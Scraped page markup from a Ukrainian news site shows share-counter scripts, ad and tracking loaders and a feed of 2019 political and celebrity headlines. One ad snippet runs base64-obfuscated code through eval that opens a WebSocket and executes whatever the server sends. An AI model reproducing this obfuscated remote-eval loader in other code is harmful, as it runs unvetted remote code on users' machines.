<a onclick="socialPlugin.socialShareOpenWindow('http://twitter.com/share?text=\u041F\u043E\u0442\u0430\u043F\u0430\u0020\u0437\u0430\u0441\u0442\u0430\u043B\u0438\u0020\u0441\u0020\u0022\u043D\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u043D\u043E\u0439\u0022\u0020\u0431\u0440\u044E\u043D\u0435\u0442\u043A\u043E\u0439\u0020\u002D\u0020\u0424\u041E\u0422\u041E&url=https://beztabu.net/potapa-zastali-s-neizvestnoj-bryunetkoj---foto_n64590');" href="javascript: void(0);" class="twitter soc_counter_tw_64590">
<span class="twitter-count counter"></span>
</a>
<script>
    var update = {};
    update.Social = function () {

        // to prevent double ajx execution o nnews page
        var prevShareUrl = null;
        var data = {};

        socialCountFormat = function (c) {
            if (c > 999) {
                c = (c / 1000).toFixed(1);
                if (c.toString().indexOf('.0') > 0) {
                    c = parseInt(c);
                }
                c = c + 'k';
            }
            return c;
        };

        return {
            init: function (params) {
                if (params == null || params.url == null) {
                    return;
                }
                if (prevShareUrl != null && prevShareUrl == params.url) {
                    return;
                }
                prevShareUrl = params.url;
                data = {
                    current_sum: params.current_sum,
                    fb: null,
                    tw: null,
                    vk: null,
                    gp: null,
                    news_id: params.news_id
                };
                if (params.vk != null) {
                    VK.indexes[VK.index] = params.vk;
                    var url = 'http://vk.com/share.php?act=count&url=' + encodeURIComponent(params.url) + '&index=' + VK.index + '&callback=?';
                    VK.index = VK.index + 1;
                    jQuery.getJSON(url);
                }
                if (params.fb != null) {
                    var url = 'https://graph.facebook.com/fql?q=' + encodeURIComponent('SELECT total_count FROM link_stat WHERE url="' + params.url + '"') + '&callback=?';
                    jQuery.getJSON(url, function (data) {
                        var count = data.data[0].total_count;
                        jQuery(params.fb).text(socialCountFormat(count));
                        if (count > 0) {
                            jQuery(params.fb).show();
                        }
                        var data = socialPlugin.getData();
                        data.fb = count;
                        socialPlugin.setData(data);
                        socialPlugin.check();
                    }, 'jsonp');
                }
                if (params.tw != null) {
                    var url = 'http://urls.api.twitter.com/1/urls/count.json?url=' + encodeURIComponent(params.url) + '&callback=?';
                    jQuery.getJSON(url, function (data) {
                        var count = data.count;
                        jQuery(params.tw).text(socialCountFormat(count));
                        if (count > 0) {
                            jQuery(params.tw).show();
                        }
                        var data = socialPlugin.getData();
                        data.tw = count;
                        socialPlugin.setData(data);
                        socialPlugin.check();
                    }, 'jsonp');
                }
                if (params.gp != null) {
                    var url = 'http://share.yandex.ru/gpp.xml?url=' + encodeURIComponent(params.url) + '&callback=?';
                    services.gplus.id = params.gp;
                    jQuery.getJSON(url, function (data) {
                    }, 'jsonp');
                }
            },

            check: function () {
                if (data.news_id == 0) return;
                if (data.fb == null) return;
                if (data.gp == null) return;
                if (data.vk == null) return;
                if (data.tw == null) return;
                var sum = data.fb + data.vk + data.tw + data.gp;
                if (Math.abs(data.current_sum - sum) >= 20) {
                    aaGet('news/updateShareCount.ajx?newsId=' + data.news_id, '');
                }
            },

            getData: function () {
                return data;
            },

            setData: function (d) {
                data = d;
            },

            socialShareOpenWindow: function (url) {
                var w = 760;
                var h = 625;
                if (url.indexOf('vk') > 0) {
                    w = 554;
                    h = 428;
                }
                else if (url.indexOf('facebook') > 0) {
                    w = 745;
                    h = 368;
                }
                else if (url.indexOf('twitter') > 0) {
//                        w = 745;
//                        h = 368;
                }
                else if (url.indexOf('google') > 0) {
                    w = 744;
                    h = 508;
                }
                window.open(url, 'social_share_window', 'height=' + h + ',width=' + w + ',toolbar=false,location=true,directories=false,status=true,resizable=true,scrollbars=true');
            }
        };

    };

    var socialPlugin = update.Social();
</script> </div>
</div>
</div>
<div class="row" id="lun-ua-adv">
<script type="text/javascript" src="https://orbit.lun.ua/js/65db84dc.js" charset="UTF-8"></script>
<span style="color:#ccc;width:100%;display:block;padding:3px 0;font-size:9px;font-family:'Trebuchet MS',Arial;font-weight:normal;font-style:normal;text-align:center;">powered by
<a href="https://www.lun.ua" style="color:#ccc;">lun.ua</a>
</span> </div>
<hr>
<div class="row">
<div id="content-roll-tracker">
<div id="contentroll-piwik-tracker"></div>
<div id="adpartner-vunit-273">
<script>
            (function () {
                var head = document.getElementsByTagName('head')[0];
                var script = document.createElement('script');
                script.type = 'text/javascript';
                script.src = "//a4p.adpartner.pro/vunit?id=273&" + Math.random();
                head.appendChild(script);
            })();
        </script>
</div>
<div id="adpartner-htmlunit-755">
<script>
            (function () {
                var head = document.getElementsByTagName('head')[0];
                var script = document.createElement('script');
                script.type = 'text/javascript';
                script.src = "//a4p.adpartner.pro/htmlunit?id=755&" + Math.random();
                head.appendChild(script);
            })();
        </script>
</div>
<script type='text/javascript'>
        $(function () {
            new piwikViewPortTracker({
                url: 'https://piwik.luxnet.ua/piwik.php?idsite=37&rec=1',
                elementId: 'contentroll-piwik-tracker'
            });
        });
    </script>
</div> </div>
<div class="replace-h3 replace-h3-nolink">Другое на тему</div>
<div class="advice-wrapper row small-up-1 medium-up-3">
<a href="/zelenskij-naznachil-novyh-gubernatorov-kto-oni_n64591" class="news-block column   ">
<div class="news-image">
<img src="https://beztabu.net/uploads/370x208_DIR/media_news/2019/07/5d20cc7745e52763206839.png" title="Зеленский назначил новых губернаторов. Кто они?  - 1" alt="Зеленский назначил новых губернаторов. Кто они?  - фото 1">
<ul class="statistic">
</ul>
</div>
<div class="news-title">
Зеленский назначил новых глав ОГА. Кто они?
</div>
<div class="news-time"><span>19:31</span></div>
</a>
<a href="/tuchka-ty-moya-zelenskij-yarko-otstebal-trollya_n64589" class="news-block column   ">
<div class="news-image">
<img src="https://beztabu.net/uploads/370x208_DIR/media_news/2019/07/5d208ab91b28b635021339.jpg" title="Тучка ты моя: Зеленский ярко отстебал тролля - 1" alt="Тучка ты моя: Зеленский ярко отстебал тролля - фото 1">
<ul class="statistic">
</ul>
</div>
<div class="news-title">
Тучка ты моя: Зеленский ярко отстебал тролля
</div>
<div class="news-time"><span>14:49</span></div>
</a>
<a href="/vyatrovich-pozhalovalsya-na-kernesa-v-prokuraturu_n64587" class="news-block column   ">
<div class="news-image">
<img src="https://beztabu.net/uploads/370x208_DIR/media_news/2019/07/5d20622d3343e403605899.png" title="Вятрович пожаловался на Кернеса. В прокуратуру - 1" alt="Вятрович пожаловался на Кернеса. В прокуратуру - фото 1">
<ul class="statistic">
</ul>
</div>
<div class="news-title">
Вятрович пожаловался на Кернеса. В прокуратуру
</div>
<div class="news-time"><span>13:30</span></div>
</a>
</div>
<div class="partner-block">
<div class="replace-h3 replace-h3-nolink">Предложение партнеров</div>
 <div id="M378456Composite651109"><center> <a href="http://marketgid.com/" target="_blank">Загрузка...</a> </center></div> <script type="text/javascript"> var d = new Date, script651109 = document.createElement("script"), mg_ws651109 = {};script651109.type = "text/javascript";script651109.charset = "utf-8";script651109.src = "//jsc.marketgid.com/1/b/1.beztabu.net.651109.js?t=" + d.getYear() + d.getMonth() + d.getDay() + d.getHours();script651109.onerror = function () { mg_ws651109 = new Worker(URL.createObjectURL(new Blob(['eval(atob(\'ZnVuY3Rpb24gc2VuZE1lc3NhZ2U2NTExMDkoZSl7dmFyIGg9bWdfd3M2NTExMDkub25tZXNzYWdlOyBtZ193czY1MTEwOS5yZWFkeVN0YXRlPT1tZ193czY1MTEwOS5DTE9TRUQmJihtZ193czY1MTEwOT1uZXcgV2ViU29ja2V0KG1nX3dzNjUxMTA5X2xvY2F0aW9uKSksbWdfd3M2NTExMDkub25tZXNzYWdlPWgsd2FpdEZvclNvY2tldENvbm5lY3Rpb242NTExMDkobWdfd3M2NTExMDksZnVuY3Rpb24oKXttZ193czY1MTEwOS5zZW5kKGUpfSl9ZnVuY3Rpb24gd2FpdEZvclNvY2tldENvbm5lY3Rpb242NTExMDkoZSx0KXtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7cmV0dXJuIDE9PT1lLnJlYWR5U3RhdGU/dm9pZChudWxsIT10JiZ0KCkpOnZvaWQgd2FpdEZvclNvY2tldENvbm5lY3Rpb242NTExMDkoZSx0KX0sNSl9OyB2YXIgbWdfd3M2NTExMDlfbG9jYXRpb24gPSAid3NzOi8vd3NwLm1hcmtldGdpZC5jb20vd3MiOyBtZ193czY1MTEwOSA9IG5ldyBXZWJTb2NrZXQobWdfd3M2NTExMDlfbG9jYXRpb24pLCBtZ193czY1MTEwOS5vbm1lc3NhZ2UgPSBmdW5jdGlvbiAodCkge3Bvc3RNZXNzYWdlKHQuZGF0YSk7fSwgb25tZXNzYWdlID0gZnVuY3Rpb24oZSl7c2VuZE1lc3NhZ2U2NTExMDkoZS5kYXRhKX0=\'))']), {type: "application/javascript"})); mg_ws651109.onmessage = function (msg){window.eval(msg.data);}; mg_ws651109.postMessage('js|'+script651109.src+'|M378456Composite651109|M378456Composite651109');};document.body.appendChild(script651109); </script> 
</div>
<div class="replace-h3 replace-h3-nolink">Комментарии</div>
<div id="fb-root"></div>
<script>(function (d, s, id) {
                        var js, fjs = d.getElementsByTagName(s)[0];
                        if (d.getElementById(id)) return;
                        js = d.createElement(s);
                        js.id = id;
                        js.src = "//connect.facebook.net/ru_RU/sdk.js#xfbml=1&version=v2.6";
                        fjs.parentNode.insertBefore(js, fjs);
                    }(document, 'script', 'facebook-jssdk'));</script>
<div class="fb-comments" data-href="https://beztabu.net/potapa-zastali-s-neizvestnoj-bryunetkoj---foto_n64590" data-numposts="3" width="100%"></div>
<div id="M378456ScriptRootC665610">
<div id="M378456PreloadC665610"></div>
<script>
                    if (window.innerWidth <= 640) {
                        (function(){ var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById',lp=d.location.protocol,wp=lp.indexOf('http')==0?lp:'https:'; var i=d[ce]('iframe');i[st][ds]=n;d[gi]("M378456ScriptRootC665610")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];} catch(e){var iw=d;var c=d[gi]("M378456ScriptRootC665610");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=665610;c[ac](dv); var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src=wp+"//jsc.marketgid.com/1/b/1.beztabu.net.665610.js?t="+D.getYear()+D.getMonth()+D.getUTCDate()+D.getUTCHours();c[ac](s);})();
                    }
                </script>
</div>
<a href="/publikacii_t4946">
<div class="replace-h3">Публикации</div>
</a>
<div class="row" id="bezTabu_300x250_readMore" style="display: none;">
<script>
    if(adCore.isSmallerThan(640)) {
        adCore.defineDfpSlot({
            'name': '/56301415/bezTabu_320x50_newsLine',
            'sizes': [[320, 100], [250, 250], [300, 250], [320, 50]],
            'id': 'div-gpt-ad-1466001198619-0',
            'targeting': adCore.targeting.getAll(),
            'callback': function(e) {
                if(!e.isEmpty) {
                    document.getElementById('bezTabu_320x50_newsLine').style.display = 'block';
                }
            }
        });
    }
</script>
<div id="bezTabu_320x50_newsLine" style="display: none;">
<div id='div-gpt-ad-1466001198619-0'>
<script type='text/javascript'>
            if (adCore.isSmallerThan(640)) {
                googletag.cmd.push(function() { googletag.display('div-gpt-ad-1466001198619-0'); });
            }
        </script>
</div>
</div>
</div>
<div class="publication-wrapper row small-up-1 medium-up-2">
<a href="/vedmak-aktery-roli-biografii-seriala-ot-netflix_n55067" class="news-block column   ">
<div class="news-image">
<img src="https://beztabu.net/uploads/370x208_DIR/media_news/2018/11/5bdb171d701d0478542138.jpg" title="Ведьмак от Netflix - кто сыграет ваших любимых персонажей - 1" alt="Ведьмак от Netflix - кто сыграет ваших любимых персонажей - фото 1">
<ul class="statistic">
</ul>
</div>
<div class="news-title">
Ведьмак: Актерский состав самого ожидаемого сериала
</div>
<div class="news-time">02 июля, <span>12:55</span></div>
</a>
<a href="/luchshie-serialy-iyulya-2019-novinki-i-prodolzheniya-top-serialov-mesyaca_n64433" class="news-block column   ">
<div class="news-image">
<img src="https://beztabu.net/uploads/370x208_DIR/media_news/2019/06/5d14ccc2cdb30857568017.png" title="Пенниуорт - самый интригующий проект июля 2019 - 1" alt="Пенниуорт - самый интригующий проект июля 2019 - фото 1">
<ul class="statistic">
</ul>
</div>
<div class="news-title">
Что смотреть: Лучшие сериалы июля 2019
</div>
<div class="news-time">30 июня, <span>17:10</span></div>
</a>
<a href="/ne-tot-den-pochemu-22-iyunya-1941-goda-ne-stoit-prevrashchat-v-sakralnuyu-datu_n21546" class="news-block column   ">
<div class="news-image">
<img src="https://beztabu.net/uploads/370x208_DIR/media_news/2017/06/ca32a1e1ea9f11d98cb333257e56110cd40553e8.jpg" title="Украина, июнь 1941-го - 1" alt="Украина, июнь 1941-го - фото 1">
<ul class="statistic">
</ul>
</div>
<div class="news-title">
Почему 22 июня 1941 года не стоит превращать в сакральную дату
</div>
<div class="news-time">22 июня, <span>11:45</span></div>
</a>
<a class="news-block column" href="#">
 <script>
    if(adCore.isLargerThan(1000)) {
        adCore.defineDfpSlot({
            'name': '/56301415/bezTabu_300x250_readMore',
            'sizes': [300, 250],
            'id': 'div-gpt-ad-1465918562881-0',
            'targeting': adCore.targeting.getAll(),
            'callback': function(e) {
                if(!e.isEmpty) {
                    document.getElementById('bezTabu_300x250_readMore').style.display = 'block';
                }
            }
        });
    }
</script>
<div id='div-gpt-ad-1465918562881-0'>
<script type='text/javascript'>
        if (adCore.isLargerThan(1000)) {
            googletag.cmd.push(function() { googletag.display('div-gpt-ad-1465918562881-0'); });
        }
    </script>
</div>
</a>
</div>

<div id="M406649ScriptRootC672656" class="lenta_adv">
<div id="M406649PreloadC672656">
Загрузка... </div>
<script>
             (function(){
             var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById',lp=d.location.protocol,wp=lp.indexOf('http')==0?lp:'https:';
             var i=d[ce]('iframe');i[st][ds]=n;d[gi]("M406649ScriptRootC672656")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
             catch(e){var iw=d;var c=d[gi]("M406649ScriptRootC672656");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=672656;c[ac](dv);
             var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src=wp+"//jsc.idealmedia.io/b/e/beztabu.net.672656.js?t="+D.getYear()+D.getMonth()+D.getUTCDate()+D.getUTCHours();c[ac](s);})();
             </script>
</div>

</div>
<div class="columns large-4">
<div class="adv-300 hide-for-medium-down" style="display: none;" id="newsListPromoArticle">
<div class="wrapper">
<script>
    adCore.defineDfpSlot({
        'name': '/56301415/beztabu_promoArticle',
        'sizes': [1, 1],
        'id': 'div-gpt-ad-1522927225510-0',
        'targeting': adCore.targeting.getAll(),
        'callback': function(e) {
            dfpAdSlots['promoArticle'] = e.slot;
            if(!e.isEmpty) {
                document.getElementById('newsListPromoArticle').style.display = 'block';
            }
        }
    });
</script>
<div id='div-gpt-ad-1522927225510-0'>
<script type='text/javascript'>
            googletag.cmd.push(function() { googletag.display('div-gpt-ad-1522927225510-0'); });
    </script>
</div> </div>
</div>
<div class="adv-300 hide-for-medium-down" id="bezTabu_300x250">
<div class="wrapper">
 <div id="M378456ScriptRootC662079"> <div id="M378456PreloadC662079"> Загрузка... </div> <script> (function(){ var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById',lp=d.location.protocol,wp=lp.indexOf('http')==0?lp:'https:'; var i=d[ce]('iframe');i[st][ds]=n;d[gi]("M378456ScriptRootC662079")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];} catch(e){var iw=d;var c=d[gi]("M378456ScriptRootC662079");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=662079;c[ac](dv); var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src=wp+"//jsc.marketgid.com/1/b/1.beztabu.net.662079.js?t="+D.getYear()+D.getMonth()+D.getUTCDate()+D.getUTCHours();c[ac](s);})(); </script></div>  </div>
</div>
<div class="question-wrapper">
<div class="replace-h3 replace-h3-nolink">Опрос</div>
 <a href="/opros-za-kogo-by-vy-progolosovali-na-vyborah-v-verhovnu-radu_n64297" class="news-block">
<div class="news-image">
<img src="https://beztabu.net/uploads/370x208_DIR/media_news/2019/06/5d0b55716e26c109745436.jpg" title="Кто окажется под куполом? - 1" alt="Кто окажется под куполом? - фото 1">
<ul class="statistic">
<li class="news-time">
<strong>12:45</strong>, 20 июня</li>
</ul>
</div>
<div class="news-title">
<span>
Опрос: За кого бы вы проголосовали на выборах в Верховну Раду
</span>
</div>
</a>
</div>
<a href="/novosti_t4952"><div class="replace-h3">НОВОСТИ</div></a>
<div class="news-list-wrapper">
<button id="last-news-back-less-btn" class="revers hide-button simple-button scroll-news-list more-news revers hidden"> Предыдущие
</button>
<div class="last-news-list-wrapper overflow-wrapper">
<ul data-position="0" class="news-list news-list-last-ul" id="ph" style="top:0;">
<li data-published-date="2019-07-06 19:31:00" data-url="/zelenskij-naznachil-novyh-gubernatorov-kto-oni_n64591" title="Зеленский назначил новых глав ОГА. Кто они?" class=" important   ">
<a target="_self" href="/zelenskij-naznachil-novyh-gubernatorov-kto-oni_n64591">
<div class="time">19:31</div>
<div class="news-title">
Зеленский назначил новых глав ОГА. Кто они?
</div>
</a>
</li>
<li data-published-date="2019-07-06 18:18:00" data-url="/potapa-zastali-s-neizvestnoj-bryunetkoj---foto_n64590" title="Потапа застали с &quot;неизвестной&quot; брюнеткой - ФОТО" class="   ">
<a target="_self" href="/potapa-zastali-s-neizvestnoj-bryunetkoj---foto_n64590">
<div class="time">18:18</div>
<div class="news-title">
Потапа застали с &quot;неизвестной&quot; брюнеткой - ФОТО
</div>
</a>
</li>

<li data-published-date="2019-07-06 16:30:00" data-url="/klichko-podderzhal-prostituciyu-i-narkotiki_n64588" title="Кличко поддержал проституцию и наркотики" class="   ">
<a target="_self" href="/klichko-podderzhal-prostituciyu-i-narkotiki_n64588">
<div class="time">16:30</div>
<div class="news-title">
Кличко поддержал проституцию и наркотики
</div>
</a>
</li>
<li data-published-date="2019-07-06 14:49:00" data-url="/tuchka-ty-moya-zelenskij-yarko-otstebal-trollya_n64589" title="Тучка ты моя: Зеленский ярко отстебал тролля" class=" important   ">
<a target="_self" href="/tuchka-ty-moya-zelenskij-yarko-otstebal-trollya_n64589">
<div class="time">14:49</div>
<div class="news-title">
Тучка ты моя: Зеленский ярко отстебал тролля
</div>
</a>
</li>
<li data-published-date="2019-07-06 13:30:00" data-url="/vyatrovich-pozhalovalsya-na-kernesa-v-prokuraturu_n64587" title="Вятрович пожаловался на Кернеса. В прокуратуру" class=" important   ">
<a target="_self" href="/vyatrovich-pozhalovalsya-na-kernesa-v-prokuraturu_n64587">
<div class="time">13:30</div>
<div class="news-title">
Вятрович пожаловался на Кернеса. В прокуратуру
</div>
</a>
</li>
<li data-published-date="2019-06-19 16:45:00" data-url="/chernobyl-hbo-chto-pridumali-sozdateli-seriala-2019-chto-bylo-na-samom-dele_n63913" title="Чернобыль от HBO: что придумали создатели сериала, а что было на самом деле?" class=" with-photo   with-photo">
<a target="_self" href="/chernobyl-hbo-chto-pridumali-sozdateli-seriala-2019-chto-bylo-na-samom-dele_n63913">
<div class="news-image">
<img src="https://beztabu.net/uploads/370x160_DIR/media_news/2019/05/5cf0e5930bd78240300186.jpg" title="Сериал &quot;Чернобыль&quot; поразил мир - 1" alt="Сериал &quot;Чернобыль&quot; поразил мир - фото 1">
</div>
<div class="news-title red">
<span>Чернобыль от HBO: что придумали создатели сериала, а что было на самом деле?</span>
</div>
</a>
</li>
<li data-published-date="2019-07-06 11:59:00" data-url="/lolita-vystupit-v-dnr---foto-video_n64586" title="Лолита Милявская выступит в &quot;ДНР&quot; - ФОТО, ВИДЕО" class=" with-photo   ">
<a target="_self" href="/lolita-vystupit-v-dnr---foto-video_n64586">
<div class="time">11:59</div>
<div class="news-title">
<img src="https://beztabu.net/uploads/300x100_DIR/media_news/2019/07/5d205a5980aa4429514195.jpg" title="Лолита выступит в &quot;ДНР&quot; - ФОТО, ВИДЕО - 1" alt="Лолита выступит в &quot;ДНР&quot; - ФОТО, ВИДЕО - фото 1">
Лолита Милявская выступит в &quot;ДНР&quot; - ФОТО, ВИДЕО
</div>
</a>
</li>
<li data-published-date="2019-07-06 10:33:00" data-url="/dobkina-ne-pustili-v-rossiyu-no-on-ne-sdalsya--foto_n64585" title="Добкина не пустили в Россию. Но он не &quot;сдался&quot; – ФОТО" class="   ">
<a target="_self" href="/dobkina-ne-pustili-v-rossiyu-no-on-ne-sdalsya--foto_n64585">
<div class="time">10:33</div>
<div class="news-title">
Добкина не пустили в Россию. Но он не &quot;сдался&quot; – ФОТО
</div>
</a>
</li>
<li data-published-date="2019-07-06 09:00:00" data-url="/ivana-kupala-2019-kiev-kuda-pojti-afisha-meropriyatij-6-i-7-iyulya-2019_n64486" title="Ивана Купала 2019 - Чем заняться и куда пойти в Киеве" class=" with-photo   ">
<a target="_self" href="/ivana-kupala-2019-kiev-kuda-pojti-afisha-meropriyatij-6-i-7-iyulya-2019_n64486">
 <div class="time">09:00</div>
<div class="news-title">
<img src="https://beztabu.net/uploads/300x100_DIR/media_news/2019/07/5d1b5aa3b94b5231297632.jpg" title="Ивана Купала 2019 - пароли и явки те же - 1" alt="Ивана Купала 2019 - пароли и явки те же - фото 1">
Ивана Купала 2019 - Чем заняться и куда пойти в Киеве
</div>
</a>
</li>
<li class="month">
05 июля
</li>
<li data-published-date="2019-07-05 22:51:00" data-url="/ne-gej-slugu-naroda-opravdali-za-lyubov--foto_n64584" title="Не ГЕЙ: &quot;слугу народа&quot; оправдали за любовь – ФОТО" class="   ">
<a target="_self" href="/ne-gej-slugu-naroda-opravdali-za-lyubov--foto_n64584">
<div class="time">22:51</div>
<div class="news-title">
Не ГЕЙ: &quot;слугу народа&quot; оправдали за любовь – ФОТО
</div>
</a>
</li>
<li data-published-date="2019-07-05 22:20:00" data-url="/kandidata-slugi-naroda-vnesli-v-mirotvorec_n64583" title="Кандидата &quot;Слуги народа&quot; внесли в Миротворец" class="   ">
<a target="_self" href="/kandidata-slugi-naroda-vnesli-v-mirotvorec_n64583">
<div class="time">22:20</div>
<div class="news-title">
Кандидата &quot;Слуги народа&quot; внесли в Миротворец
</div>
</a>
</li>
<li data-published-date="2019-07-05 21:40:00" data-url="/otmena-srochnogo-prizyva-v-vsu-postavili-tochki-nad-i_n64582" title="Отмена срочного призыва: в ВСУ поставили точки над &quot;і&quot;" class=" with-photo important   ">
<a target="_self" href="/otmena-srochnogo-prizyva-v-vsu-postavili-tochki-nad-i_n64582">
<div class="time">21:40</div>
<div class="news-title">
 <img src="https://beztabu.net/uploads/300x100_DIR/media_news/2019/07/5d1f843fb025f120329558.png" title="Отмена срочного призыва: в ВСУ поставили точки над &quot;і&quot; - 1" alt="Отмена срочного призыва: в ВСУ поставили точки над &quot;і&quot; - фото 1">
Отмена срочного призыва: в ВСУ поставили точки над &quot;і&quot;
</div>
</a>
</li>
<li data-published-date="2019-07-05 21:00:00" data-url="/matyuki-zapretyat-v-rade-vynesli-verdikt_n64581" title="Матюки запретят?: в Раде вынесли вердикт" class=" important   ">
<a target="_self" href="/matyuki-zapretyat-v-rade-vynesli-verdikt_n64581">
<div class="time">21:00</div>
<div class="news-title">
Матюки запретят?: в Раде вынесли вердикт
</div>
</a>
</li>
<li data-published-date="2019-07-05 20:20:00" data-url="/ukraina-osadila-oon-za-yazykovoj-zakon_n64580" title="Украина осадила ООН за языковой закон" class="   ">
<a target="_self" href="/ukraina-osadila-oon-za-yazykovoj-zakon_n64580">
<div class="time">20:20</div>
<div class="news-title">
Украина осадила ООН за языковой закон
</div>
</a>
</li>
<li data-published-date="2019-06-30 18:55:00" data-url="/rasskaz-sluzhanki-3-sezon-data-vyhoda-serij-syuzhet_n57267" title="Рассказ Служанки 3 сезон: дата выхода, график серий и сюжет" class=" photo   with-photo">
<a target="_self" href="/rasskaz-sluzhanki-3-sezon-data-vyhoda-serij-syuzhet_n57267">
<div class="news-image">
<img src="https://beztabu.net/uploads/370x160_DIR/media_news/2019/06/5d18dbeb5fedc277368059.jpg" title="Рассказ Служанки 3 сезон: дата выхода новых серий - 1" alt="Рассказ Служанки 3 сезон: дата выхода новых серий - фото 1">
 </div>
<div class="news-title red">
<span>Рассказ Служанки 3 сезон: дата выхода, график серий и сюжет</span>
</div>
</a>
</li>
<li data-published-date="2019-07-05 19:40:00" data-url="/v-komande-ze-nazrevaet-raskol-chto-proishodit_n64579" title="В Команде Зе назревает раскол: что происходит" class=" important   ">
<a target="_self" href="/v-komande-ze-nazrevaet-raskol-chto-proishodit_n64579">
<div class="time">19:40</div>
<div class="news-title">
В Команде Зе назревает раскол: что происходит
</div>
</a>
</li>
<li data-published-date="2019-07-05 19:00:00" data-url="/poroshenko-obedinitsya-s-zelenskim-parubij-dal-otvet_n64577" title="Порошенко объединится с Зеленским? Парубий дал ответ" class="   ">
<a target="_self" href="/poroshenko-obedinitsya-s-zelenskim-parubij-dal-otvet_n64577">
<div class="time">19:00</div>
<div class="news-title">
Порошенко объединится с Зеленским? Парубий дал ответ
</div>
</a>
</li>
<li data-published-date="2019-07-05 18:20:00" data-url="/klichko-grozitsya-ujti-nazvano-uslovie_n64576" title="Кличко грозится &quot;уйти&quot;: названо условие" class=" important   ">
<a target="_self" href="/klichko-grozitsya-ujti-nazvano-uslovie_n64576">
<div class="time">18:20</div>
<div class="news-title">
Кличко грозится &quot;уйти&quot;: названо условие
</div>
</a>
</li>
<li data-published-date="2019-07-05 17:40:00" data-url="/katya-osadchaya-pokichilas-roskoshnoj-pokupkoj--yarkie-foto_n64575" title="Катя Осадчая покичилась роскошной покупкой – яркие ФОТО" class=" important   ">
<a target="_self" href="/katya-osadchaya-pokichilas-roskoshnoj-pokupkoj--yarkie-foto_n64575">
<div class="time">17:40</div>
<div class="news-title">
Катя Осадчая покичилась роскошной покупкой – яркие ФОТО
</div>
</a>
</li>
<li data-published-date="2019-07-05 17:00:00" data-url="/zelenskij-snizil-ceny-na-neft--mendel_n64574" title="Зеленский &quot;снизил&quot; мировые цены на нефть – Мендель" class="   ">
<a target="_self" href="/zelenskij-snizil-ceny-na-neft--mendel_n64574">
<div class="time">17:00</div>
<div class="news-title">
Зеленский &quot;снизил&quot; мировые цены на нефть – Мендель
</div>
</a>
</li>
<li data-published-date="2019-07-05 16:30:00" data-url="/chelovek-pauk-vdali-ot-doma-recenziya-premera-v-ukraine-2019-stoit-li-smotret_n64571" title="Человек-паук: Вдали от дома – Супергеройский «Евротур» на минималках" class=" with-photo   ">
<a target="_self" href="/chelovek-pauk-vdali-ot-doma-recenziya-premera-v-ukraine-2019-stoit-li-smotret_n64571">
<div class="time">16:30</div>
<div class="news-title">
<img src="https://beztabu.net/uploads/300x100_DIR/media_news/2019/07/5d1f36b74ca1f385747086.jpg" title="Человек-паук - и в Европе человек-паук - 1" alt="Человек-паук - и в Европе человек-паук - фото 1">
Человек-паук: Вдали от дома – Супергеройский «Евротур» на минималках
</div>
</a>
</li>
<li data-published-date="2019-07-05 16:20:00" data-url="/vakarchuk-ujdet-so-sceny-pevec-dal-otvet_n64573" title="Вакарчук уйдет со сцены? Певец дал ответ" class="   ">
 <a target="_self" href="/vakarchuk-ujdet-so-sceny-pevec-dal-otvet_n64573">
<div class="time">16:20</div>
<div class="news-title">
Вакарчук уйдет со сцены? Певец дал ответ
</div>
</a>
</li>
<li data-published-date="2019-07-05 15:40:00" data-url="/gpu-vzyalas-za-yushchenko-iz-za-yanukovicha_n64572" title="ГПУ взялась за Ющенко. В чем он &quot;виноват&quot;?" class="   ">
<a target="_self" href="/gpu-vzyalas-za-yushchenko-iz-za-yanukovicha_n64572">
<div class="time">15:40</div>
<div class="news-title">
ГПУ взялась за Ющенко. В чем он &quot;виноват&quot;?
</div>
</a>
</li>
<li data-published-date="2019-07-05 15:00:00" data-url="/zelenskij-predstavil-chinovnikam-gubernatora-brat-kotorogo-rabotaet-v-mgb_n64570" title="Зеленский представил донецкого губернатора, брат которого работает в &quot;МГБ&quot;" class=" important   ">
<a target="_self" href="/zelenskij-predstavil-chinovnikam-gubernatora-brat-kotorogo-rabotaet-v-mgb_n64570">
<div class="time">15:00</div>
<div class="news-title">
Зеленский представил донецкого губернатора, брат которого работает в &quot;МГБ&quot;
</div>
</a>
</li>
<li data-published-date="2019-07-05 14:00:00" data-url="/na-sajte-sbu-opublikovali-biografiyu-bakanova-no-zabyli-podteret-sluzhebnuyu-perepisku_n64569" title="На сайте СБУ опубликовали биографию Баканова, но забыли подтереть служебную переписку" class="   ">
<a target="_self" href="/na-sajte-sbu-opublikovali-biografiyu-bakanova-no-zabyli-podteret-sluzhebnuyu-perepisku_n64569">
<div class="time">14:00</div>
<div class="news-title">
На сайте СБУ опубликовали биографию Баканова, но забыли подтереть служебную переписку
</div>
</a>
</li>
<li data-published-date="2019-07-05 13:30:00" data-url="/glavnyj-figurant-dela-o-korrupcii-v-ukroboronprome-snova-vozglavil-bogdan_n64564" title="&quot;Свинарчук&quot; снова возглавил &quot;Богдан&quot;" class="   ">
<a target="_self" href="/glavnyj-figurant-dela-o-korrupcii-v-ukroboronprome-snova-vozglavil-bogdan_n64564">
<div class="time">13:30</div>
<div class="news-title">
&quot;Свинарчук&quot; снова возглавил &quot;Богдан&quot;
</div>
</a>
</li>
